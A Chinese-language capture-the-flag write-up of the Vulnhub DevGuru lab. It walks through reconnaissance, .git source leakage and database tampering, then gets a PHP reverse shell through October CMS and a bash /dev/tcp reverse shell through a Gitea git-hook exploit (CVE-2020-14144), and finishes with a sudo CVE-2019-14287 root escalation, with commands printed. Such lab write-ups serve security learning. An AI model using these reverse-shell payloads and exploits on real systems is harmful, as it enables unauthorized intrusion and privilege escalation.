一、环境搭建
VM版本:17.5.1 build-23298084
攻击机:Kali2024(下载地址:https://www.kali.org/)
靶机:vulnhub靶场Devguru(下载地址:https://www.vulnhub.com/entry/devguru-1,620/)
网络环境:两台主机都设置NAT模式
踩坑1:使用vmware workstation打开Devguru,可能存在兼容性问题兼容性,我是选择重试继续安装也能正常玩耍,也可以更改VM虚拟机硬件为16.x。
解决环境配置问题也是安全必修课之一,细心解决并多总结即可!环境准备完毕,就可以娱乐的玩靶场了。
二、信息收集
1、收集IP、端口、目录信息
(1)确定靶机、攻击机IP,Kali攻击机使用ifconfig查看的IP为:192.168.232.128
(2)使用kali的nmap进行网段扫描、全端口扫描:nmap -p 1-65535 192.168.232.0/24
发现靶机的IP为:192.168.232.157 开放端口22、80、8585
(3)实战中优先访问80、8585web页面端口。22是ssh端口可以尝试爆破,不过成功概率极低。
http://192.168.232.157是网站首页,未发现任何可利用信息。
http://192.168.232.157:8585是gitea的首页,gitea版本为1.12.5存在历史漏洞。
(4)扫描http://192.168.232.157站点目录,发现利用点:
/.git/文件泄露 mysql登录地址 /adminer.php
扫描http://192.168.232.157:8585 站点目录,未发现什么有价值的利用点,只有一个登录处。
2、信息整合、漏洞利用
(1)两个登录框的账号密码都未知,威胁建模后,发现/.git/泄露漏洞可以利用,从这里入手。使用git利用工具GitHack-master爬取站点的源码。
(2)成功获得源码文件,开始审计源码,寻找有价值的信息,这里一眼就看到了config配置文件。从配置文件中获取了一个mysql用户。
拿下mysql后台低权限【1】
(3)去站点80端口的/adminer.php后台尝试登录,非常好,成功进入mysql后台。
(4)进入mysql数据库攻击优先顺序:
方法1:权限足够,直接写入一句话拿下网站权限
方法2:翻找数据表获取其他站点的账号密码,再进行后续的提权
(5)这里使用方法2,优先查看backend_user数据表的信息,发现一个账号密码,看样子就知道不容易解密。
(6)目前解密失败就尝试换一种思路,自己创建一个用户,并且权限设置为管理员。
(7)模仿游戏,尽量能设置一样,这样权限也会一样,再把添加的gjc用户加入管理员组中。
拿下october后台权限【2】
(8)从文件名规律猜测存在站点backend,访问站点:http://192.168.232.157/backend,使用创建的账号gjc 密码123456尝试登录,登录成功。
(9)kali工具或者网上搜索october-cms存在已知漏洞,后台可以文件上传、创建网页反弹shell,有兴趣了解参考大神文章:https://blog.csdn.net/m0_66299232/article/details/129119565
october获取网站权限【3】
(10)创建一个网页,写入反弹shell的代码:
function onStart(){
//nc监听7777端口
$s=fsockopen("攻击机IP",7777);
$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);
}
(11)Kali攻击机nc监听7777端口:nc -lvvp 7777
(12)保持后查看网页,成功反弹shell。
(13)whoami查看权限,只是web权限太低了,靶场最终需要拿下root权限,尝试提权。
(14)翻一下目录,发现/var/backups下面有个备份文件app.ini.bak ,使用cat查看一下,获取到一个gitea和密码UfFPTF8C8jjxVF2m的mysql账号,刚好http://192.168.232.157:8585是gitea,猜测后面肯定有关联,正所谓无巧不成书!
拿下mysql后台高权限【4】
(15)去http://192.168.232.157/adminer.php登录看看,成功进入!
(16)查看user表信息,看到一个frank用户,使用了pbkdf2加密,此处有两种办法:
方法1:查看网站源码,分析加密方式,再根据加密写出解密脚本得到密码。(实战推荐这种)
方法2:修改密码,编辑数据表,修改加密方式为Bcrypt,密码改为123456(靶场推荐这种)
(17)Bcrypt加密网站:https://www.jisuan.mobi/nX7.html。修改两处即可!
拿下gieat站点后台权限【5】
(18)使用账号gieat密码123456成功登录http://192.168.232.157:8585 站点后台。
gieat获取普通用户权限【6】
(19)这里也是难点,gieat站点后台有个远程命令执行漏洞,文章地址:
Exploiting CVE-2020-14144 - GiTea Authenticated Remote Code Execution using git hooks · Podalirius访问http://192.168.232.157:8585/frank/devguru-website/settings/hooks/git/pre-receive写入反弹命令:
bash -c "exec bash -i >& /dev/tcp/192.168.232.128/5566 0>&1"
(20)保存后,Kali创建监听5566端口,按照原理编辑README.md文件。
(21)在文件中随机敲几个空格提交修改,既可成功反弹shell。
(22)查看权限,是frank用户,普通权限,无法查看root目录下面的文件,只能进行权限提升。
三、权限提升
1、Linux常见提权手段总结
【1】内核溢出漏洞提权,例如:cve-2016-5195、cve_2021_4034等,也就是常说的脏牛系。
【2】SUID、SUDO、SUDO历史CVE漏洞提权
【3】Cron计划任务提权、path环境变量提权、NFS协议提权
【4】数据库类型提权、Capability能力
【5】其他.. ....LD_Preload加载\LXD\docker等等
以上是本人学过的linux提权方式,遗漏的欢迎大家评论区补充。
2、上传提权综合类脚本,PEASS-ng.sh工具几乎包含了上面全部手段探测,算是提权神器。windows中也能用。
将脚本放到Kali的root根目录下面,python开启一个服务终端:python -m http.server 8080
然后靶机进入/tmp目录远程下载文件:wget http://192.168.232.128:8080/PEASS-ng.sh
3、进入靶机的/tmp目录下面,可以看到文件被成功访问下载。
4、赋予文件执行权限:chmod +x PEASS-ng.sh
执行文件:./PEASS-ng.sh
工具爬取出了suid等可利用信息,suid、sudo等提权参考文章:https://gtfobins.github.io/
5、sudo -l 查看可利用命令,发现/usr/bin/sqlite3
6、使用命令:sudo /usr/bin/sqlite3 /dev/null '.shell /bin/sh' 发现提权失败,权限不足。
7、因为这里有一个考点,就是sudo版本1.8.21存在CVE-2019-14287漏洞。(CVE-2019-14287学习文章:CVE-2019-14287:sudo权限绕过漏洞分析与复现_运行)
拿下站点root权限【7】
8、将命令修改整理后:sudo -u#-1 /usr/bin/sqlite3 /dev/null '.shell /bin/sh'
9、至此,靶场完结!!!
四、关卡总结
考点:
1、拿下站点、敏感文件后,需要细心的审计搜索有价值的信息,特别是账号密码。
2、常见网站october、gieat的历史漏洞,利用已知漏洞反弹shell,拿下网站。
3、熟悉数据库后台创建用户,添加用户组,编辑用户的操作。
4、了解linux提权常用操作,内核漏洞>suid/sudo>环境变量/计划任务等等。
难点:
1、常见网站october、gieat的历史漏洞,这些站点的漏洞能否成功利用提权,对于小白来说是块硬骨头。
2、获取mysql的frank用户时,此处用的是修改加密方式、修改密码。实战中此操作风险太高。需要根据前面获得的源码分析加解密方式,才是最安全合理的。但是代码能力要求很高
